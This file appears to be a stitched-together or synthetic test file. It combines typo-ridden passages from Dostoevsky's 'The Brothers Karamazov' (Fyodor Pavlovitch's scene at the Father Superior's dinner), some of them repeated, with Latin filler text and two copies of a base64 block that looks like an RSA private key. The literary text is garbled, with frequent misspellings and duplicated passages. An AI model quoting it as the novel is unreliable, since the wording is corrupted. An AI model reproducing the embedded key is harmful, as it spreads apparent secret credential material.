"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Itaque verae amicitiae difficillime reperiuntur in iis qui in honoribus reque publica versantur; ubi enim istum invenias qui honorem amici anteponat suo? Quid? Haec ut omittam, quam graves, quam difficiles plerisque videntur calamitatum societates! Ad quas non est facile inventu qui descendant. Quamquam Ennius recte.
Et interdum acciderat, ut siquid in penetrali secreto nullo citerioris vitae ministro praesente paterfamilias uxori susurrasset in aurem, velut Amphiarao referente aut Marcio, quondam vatibus inclitis, postridie disceret imperator. ideoque etiam parietes arcanorum soli conscii timebantur.
Iamque lituis cladium concrepantibus internarum non celate ut antea turbidum saeviebat ingenium a veri consideratione detortum et nullo inpositorum vel conpositorum fidem sollemniter inquirente nec discernente a societate noxiorum insontes velut exturbatum e iudiciis fas omne discessit, et causarum legitima silente defensione carnifex rapinarum sequester et obductio capitum et bonorum ubique multatio versabatur per orientales provincias, quas recensere puto nunc oportunum absque Mesopotamia digesta, cum bella Parthica dicerentur, et Aegypto, quam necessario aliud reieci ad tempus.
Eodem tempore Serenianus ex duce, cuius ignavia populatam in Phoenice Celsen ante rettulimus, pulsatae maiestatis imperii reus iure postulatus ac lege, incertum qua potuit suffragatione absolvi, aperte convictus familiarem suum cum pileo, quo caput operiebat, incantato vetitis artibus ad templum misisse fatidicum, quaeritatum expresse an ei firmum portenderetur imperium, ut cupiebat, et cunctum.
Utque aegrum corpus quassari etiam levibus solet offensis, ita animus eius angustus et tener, quicquid increpuisset, ad salutis suae dispendium existimans factum aut cogitatum, insontium caedibus fecit victoriam luctuosam.
Nec sane haec sola pernicies orientem diversis cladibus adfligebat. Namque et Isauri, quibus est usitatum saepe pacari saepeque inopinis excursibus cuncta miscere, ex latrociniis occultis et raris, alente inpunitate adulescentem in peius audaciam ad bella gravia proruperunt, diu quidem perduelles spiritus inrequietis motibus erigentes, hac tamen indignitate perciti vehementer, ut iactitabant, quod eorum capiti quidam consortes apud Iconium Pisidiae oppidum in amphitheatrali spectaculo feris praedatricibus obiecti sunt praeter morem.
Unde Rufinus ea tempestate praefectus praetorio ad discrimen trusus est ultimum. ire enim ipse compellebatur ad militem, quem exagitabat inopia simul et feritas, et alioqui coalito more in ordinarias dignitates asperum semper et saevum, ut satisfaceret atque monstraret, quam ob causam annonae convectio sit impedita.
Hac ita persuasione reducti intra moenia bellatores obseratis undique portarum aditibus, propugnaculis insistebant et pinnis, congesta undique saxa telaque habentes in promptu, ut si quis se proripuisset interius, multitudine missilium sterneretur et lapidum.
Nihil est enim virtute amabilius, nihil quod magis adliciat ad diligendum, quippe cum propter virtutem et probitatem etiam eos, quos numquam vidimus, quodam modo diligamus. Quis est qui C. Fabrici, M'. Curi non cum caritate aliqua benevola memoriam usurpet, quos numquam viderit? quis autem est, qui Tarquinium Superbum, qui Sp. Cassium, Sp. Maelium non oderit? Cum duobus ducibus de imperio in Italia est decertatum, Pyrrho et Hannibale; ab altero propter probitatem eius non nimis alienos animos habemus, alterum propter crudelitatem semper haec civitas oderit.
Sed cautela nimia in peiores haeserat plagas, ut narrabimus postea, aemulis consarcinantibus insidias graves apud Constantium, cetera medium principem sed siquid auribus eius huius modi quivis infudisset ignotus, acerbum et inplacabilem et in hoc causarum titulo dissimilem sui.
Isdem diebus Apollinaris Domitiani gener, paulo ante agens palatii Caesaris curam, ad Mesopotamiam missus a socero per militares numeros immodice scrutabatur, an quaedam altiora meditantis iam Galli secreta susceperint scripta, qui conpertis Antiochiae gestis per minorem Armeniam lapsus Constantinopolim petit exindeque per protectores retractus artissime tenebatur.
Vide, quantum, inquam, fallare, Torquate. oratio me istius philosophi non offendit; nam et complectitur verbis, quod vult, et dicit plane, quod intellegam; et tamen ego a philosopho, si afferat eloquentiam, non asperner, si non habeat, non admodum flagitem. re mihi non aeque satisfacit, et quidem locis pluribus. sed quot homines, tot sententiae; falli igitur possumus.
Ibi victu recreati et quiete, postquam abierat timor, vicos opulentos adorti equestrium adventu cohortium, quae casu propinquabant, nec resistere planitie porrecta conati digressi sunt retroque concedentes omne iuventutis robur relictum in sedibus acciverunt.
Ego vero sic intellego, Patres conscripti, nos hoc tempore in provinciis decernendis perpetuae pacis habere oportere rationem. Nam quis hoc non sentit omnia alia esse nobis vacua ab omni periculo atque etiam suspicione belli?
Ac ne quis a nobis hoc ita dici forte miretur, quod alia quaedam in hoc facultas sit ingeni, neque haec dicendi ratio aut disciplina, ne nos quidem huic uni studio penitus umquam dediti fuimus. Etenim omnes artes, quae ad humanitatem pertinent, habent quoddam commune vinculum, et quasi cognatione quadam inter se continentur.
Iis igitur est difficilius satis facere, qui se Latina scripta dicunt contemnere. in quibus hoc primum est in quo admirer, cur in gravissimis rebus non delectet eos sermo patrius, cum idem fabellas Latinas ad verbum e Graecis expressas non inviti legant. quis enim tam inimicus paene nomini Romano est, qui Ennii Medeam aut Antiopam Pacuvii spernat aut reiciat, quod se isdem Euripidis fabulis delectari dicat, Latinas litteras oderit?
Post quorum necem nihilo lenius ferociens Gallus ut leo cadaveribus pastus multa huius modi scrutabatur. quae singula narrare non refert, me professione modum, quod evitandum est, excedamus.
Ipsam vero urbem Byzantiorum fuisse refertissimam atque ornatissimam signis quis ignorat? Quae illi, exhausti sumptibus bellisque maximis, cum omnis Mithridaticos impetus totumque Pontum armatum affervescentem in Asiam atque erumpentem, ore repulsum et cervicibus interclusum suis sustinerent, tum, inquam, Byzantii et postea signa illa et reliqua urbis ornanemta sanctissime custodita tenuerunt.
Nisi mihi Phaedrum, inquam, tu mentitum aut Zenonem putas, quorum utrumque audivi, cum mihi nihil sane praeter sedulitatem probarent, omnes mihi Epicuri sententiae satis notae sunt. atque eos, quos nominavi, cum Attico nostro frequenter audivi, cum miraretur ille quidem utrumque, Phaedrum autem etiam amaret, cotidieque inter nos ea, quae audiebamus, conferebamus, neque erat umquam controversia, quid ego intellegerem, sed quid probarem.
Paphius quin etiam et Cornelius senatores, ambo venenorum artibus pravis se polluisse confessi, eodem pronuntiante Maximino sunt interfecti. pari sorte etiam procurator monetae extinctus est. Sericum enim et Asbolium supra dictos, quoniam cum hortaretur passim nominare, quos vellent, adiecta religione firmarat, nullum igni vel ferro se puniri iussurum, plumbi validis ictibus interemit. et post hoe flammis Campensem aruspicem dedit, in negotio eius nullo sacramento constrictus.
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
